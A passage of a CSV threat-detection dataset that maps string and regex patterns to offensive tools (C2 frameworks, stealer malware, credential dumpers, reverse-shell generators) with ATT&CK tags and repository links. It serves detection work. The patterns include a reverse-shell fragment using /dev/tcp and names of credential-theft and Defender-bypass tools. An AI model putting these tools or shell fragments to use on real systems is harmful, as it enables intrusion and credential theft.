T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*!put */tmp*",".{0,1000}!put\s.{0,1000}\/tmp.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*!shell *",".{0,1000}!shell\s.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*!tunnels --tcp*",".{0,1000}!tunnels\s\-\-tcp.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*!use *aes256_py*",".{0,1000}!use\s.{0,1000}aes256_py.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*!use *reflected_assembly*",".{0,1000}!use\s.{0,1000}reflected_assembly.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*!wPkgPath!*!ak!*",".{0,1000}!wPkgPath!.{0,1000}!ak!.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*""active_wraith_clients""*",".{0,1000}\""active_wraith_clients\"".{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*""ADWS request with ldapbase (*",".{0,1000}\""ADWS\srequest\swith\sldapbase\s\(.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*""bypass-clm""*",".{0,1000}\""bypass\-clm\"".{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","0","N/A","8","3","202","33","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z" "*""-c \""sh -i >& /dev/tcp/*",".{0,1000}\""\-c\s\\\""sh\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*""Dump BH data""*",".{0,1000}\""Dump\sBH\sdata\"".{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*""Evilginx Mastery Course""*",".{0,1000}\""Evilginx\sMastery\sCourse\"".{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","0","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*""Generate reverse shell payloads.""*",".{0,1000}\""Generate\sreverse\sshell\spayloads\.\"".{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z" "*""Granted user * DCSYNC rights!*",".{0,1000}\""Granted\suser\s.{0,1000}\sDCSYNC\srights!.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "*""iN""+""voK""+""e""+""-""+""eXP""+""re""+""sSi""+""oN""*",".{0,1000}\""iN\""\+\""voK\""\+\""e\""\+\""\-\""\+\""eXP\""\+\""re\""\+\""sSi\""\+\""oN\"".{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*""Injecting shellcode into PowerShell""*",".{0,1000}\""Injecting\sshellcode\sinto\sPowerShell\"".{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*""localadmin123!""*",".{0,1000}\""localadmin123!\"".{0,1000}","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","0","N/A","10","2","150","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z" "*""N/A (Likely Pirated)""*",".{0,1000}\""N\/A\s\(Likely\sPirated\)\"".{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*""NSA0XF$""*",".{0,1000}\""NSA0XF\$\"".{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","9","1","70","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z" "*""sacrificialO365Passwords"": *",".{0,1000}\""sacrificialO365Passwords\""\:\s.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*""sacrificialO365Username"": *",".{0,1000}\""sacrificialO365Username\""\:\s.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*""small web shell by zaco*",".{0,1000}\""small\sweb\sshell\sby\szaco.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*""Stardust MessageBox""*",".{0,1000}\""Stardust\sMessageBox\"".{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","10","10","943","148","2024-01-30T23:37:09Z","2022-02-20T01:23:35Z" "*""Starting Elevating to SYSTEM""*",".{0,1000}\""Starting\sElevating\sto\sSYSTEM\"".{0,1000}","offensive_tool_keyword","WDBypass","Disable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)","T1089 - T1562.001 - T1548.002","TA0005 - TA0040 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://bitbucket.org/evilgreyswork/wd-uac/downloads/","1","0","https://blog.injectexp.dev/2024/02/28/disable-windows-defender-uac-bypass-upgrade-to-system/","10","10","N/A","N/A","N/A","N/A" "*""Starting WD Disable""*",".{0,1000}\""Starting\sWD\sDisable\"".{0,1000}","offensive_tool_keyword","WDBypass","Disable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)","T1089 - T1562.001 - T1548.002","TA0005 - TA0040 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://bitbucket.org/evilgreyswork/wd-uac/downloads/","1","0","https://blog.injectexp.dev/2024/02/28/disable-windows-defender-uac-bypass-upgrade-to-system/","10","10","N/A","N/A","N/A","N/A" "*""Successful Connection PME""*",".{0,1000}\""Successful\sConnection\sPME\"".{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*""The LaZagne project""*",".{0,1000}\""The\sLaZagne\sproject\"".{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*""User32LogonProcesss""*",".{0,1000}User32LogonProcesss.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://x.com/_RastaMouse/status/1747636529613197757","1","0","typo in the process name used when calling LsaRegisterLogonProcess","10","10","N/A","N/A","N/A","N/A" "*""WorkstationName"">RULER*",".{0,1000}\""WorkstationName\""\>RULER\<\/Data\>.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*# @oldboy21*",".{0,1000}\#\s\s\@oldboy21.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*# Add random newlines to the obfuscated code*",".{0,1000}\#\sAdd\srandom\snewlines\sto\sthe\sobfuscated\scode.{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005?","N/A","N/A","Defense Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","0","N/A","8","1","60","11","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z" "*# Author: Dahvid Schloss a.k.a APT Big Daddy*",".{0,1000}\#\sAuthor\:\sDahvid\sSchloss\sa\.k\.a\sAPT\sBig\sDaddy.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","N/A","9","1","60","4","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z" "*# Author: Panagiotis Chartas (t3l3machus)*",".{0,1000}\#\sAuthor\:\sPanagiotis\sChartas\s\(t3l3machus\).{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*# download virRu5*",".{0,1000}\#\sdownload\svirRu5.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*# execute virRu5*",".{0,1000}\#\sexecute\svirRu5.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*# Force Admin: Bypass Admin Privileges?*",".{0,1000}\#\sForce\sAdmin\:\sBypass\sAdmin\sPrivileges\?.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*# Inject: Inject payload into Discord?*",".{0,1000}\#\sInject\:\sInject\spayload\sinto\sDiscord\?.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*# Injection URL: Raw URL to injection payload*",".{0,1000}\#\sInjection\sURL\:\sRaw\sURL\sto\sinjection\spayload.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*# Perform the HTTP POST request to search emails*",".{0,1000}\#\sPerform\sthe\sHTTP\sPOST\srequest\sto\ssearch\semails.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*# Pop up the calculator when you start excel.exe*",".{0,1000}\#\sPop\sup\sthe\scalculator\swhen\syou\sstart\sexcel\.exe.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z" "*# Pop up the calculator when you start powerpoint.exe*",".{0,1000}\#\sPop\sup\sthe\scalculator\swhen\syou\sstart\spowerpoint\.exe.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z" "*# Pop up the calculator when you start winword.exe*",".{0,1000}\#\sPop\sup\sthe\scalculator\swhen\syou\sstart\swinword\.exe.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z" "*# socksport = 9050*",".{0,1000}\#\ssocksport\s\=\s9050.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*# Sticky Keys backdoor exists*",".{0,1000}\#\sSticky\sKeys\sbackdoor\sexists.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","9","1","26","7","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z" "*## DLHell Main function*",".{0,1000}\#\#\sDLHell\sMain\sfunction.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*## Extracting Private Key from Active Directory Store*",".{0,1000}\#\#\sExtracting\sPrivate\sKey\sfrom\sActive\sDirectory\sStore.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","0","N/A","10","3","287","63","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z" "*#1 - Smuggling binary via Service DisplayName*",".{0,1000}\#1\s\-\sSmuggling\sbinary\svia\sService\sDisplayName.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*#2 - Smuggling binary via WMI*",".{0,1000}\#2\s\-\sSmuggling\sbinary\svia\sWMI.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*#Author Yehia Elghaly*",".{0,1000}\#Author\sYehia\sElghaly.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","0","N/A","8","10","3","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z" "*#Bind Shell (Client) (XOR Algorithm)*",".{0,1000}\#Bind\sShell\s\(Client\)\s\(XOR\sAlgorithm\).{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","0","N/A","8","10","3","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z" "*#Dumps exported function from legit DLL using winedump*",".{0,1000}\#Dumps\sexported\sfunction\sfrom\slegit\sDLL\susing\swinedump.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*#include ""RogueOxidResolver.h*",".{0,1000}\#include\s\""RogueOxidResolver\.h.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*#include ""ShoggothEngine.h""*",".{0,1000}\#include\s\""ShoggothEngine\.h\"".{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*#Removes previous hijacked dll*",".{0,1000}\#Removes\sprevious\shijacked\sdll.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*$ADelegReport*",".{0,1000}\$ADelegReport.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*$AllCurrentPwdDiscovered*",".{0,1000}\$AllCurrentPwdDiscovered.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","0","N/A","10","1","60","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z" "*$attacker_IPlist*",".{0,1000}\$attacker_IPlist.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*$BaseTicket | Select-String -Pattern 'doI.*",".{0,1000}\$BaseTicket\s\|\sSelect\-String\s\-Pattern\s\'doI\..{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*$C2_SERVER*",".{0,1000}\$C2_SERVER.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 